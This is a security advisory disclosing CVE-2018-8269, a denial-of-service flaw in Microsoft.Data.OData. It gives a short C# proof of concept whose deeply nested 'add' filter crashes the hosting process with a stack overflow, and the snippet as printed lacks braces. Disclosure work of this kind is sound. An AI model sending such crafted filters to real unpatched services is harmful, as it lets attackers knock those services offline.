OData Denial of Service Vulnerability

Aleph Research Advisory





  1. Microsoft.Data.OData

Vulnerable Version

version 5.8.3 and below


Upgrade to version 5.8.4

Technical Details

The library Microsoft.Data.OData is used for handling OData V1-3 requests.

It is used by many applications and services that expose OData API, including SharePoint Server and Azure Active Directory Graph API. it has ~ 30,000,000 downloads in Nuget (.NET package manager).

A core functionality of the library is parsing an OData filter.

Parsing a crafted OData filter using this library, results in deep recursion which leads to Stack Overflow exception and crash of the hosting process.

An application that uses this library to provide OData API might be vulnerable to DOS attack. An attacker can shut down the application remotely by sending a crafted request few times.

Information about the exploitation of the vulnerability can be found in our blog post.

Proof Of Concept

The following program demonstrates how a crafted filter can be used to initiate StackOverflowException

using System.Linq;
using Microsoft.Data.Edm.Library;
using Microsoft.Data.OData.Query;
using Microsoft.Data.OData.Query.SemanticAst;
namespace TestOdata
    class Program
        static void Main(string[] args)
            EdmModel model = new EdmModel();
            var customer = new EdmEntityType("TestModel", "TestModel");
            //Generate the filter – "1 add 1 add 1 add 1 add ......"
            string filter = string.Concat(Enumerable.Repeat("1 add ", 11200)) + "1";

            //Following function will throw StackOverflowException
            FilterClause filter = ODataUriParser.ParseFilter(filter, model, customer);


  • 22-Oct-18
    : Public disclosure.
  • 11-Sep-18
    : CVE-2018-8269 assigned.
  • 14-Aug-18
    : Patch available.
  • 27-Jun-18
    : Reported (Remote attack vector).
  • 22-Apr-18
    : Reported (Microsoft Security Response Center).



External References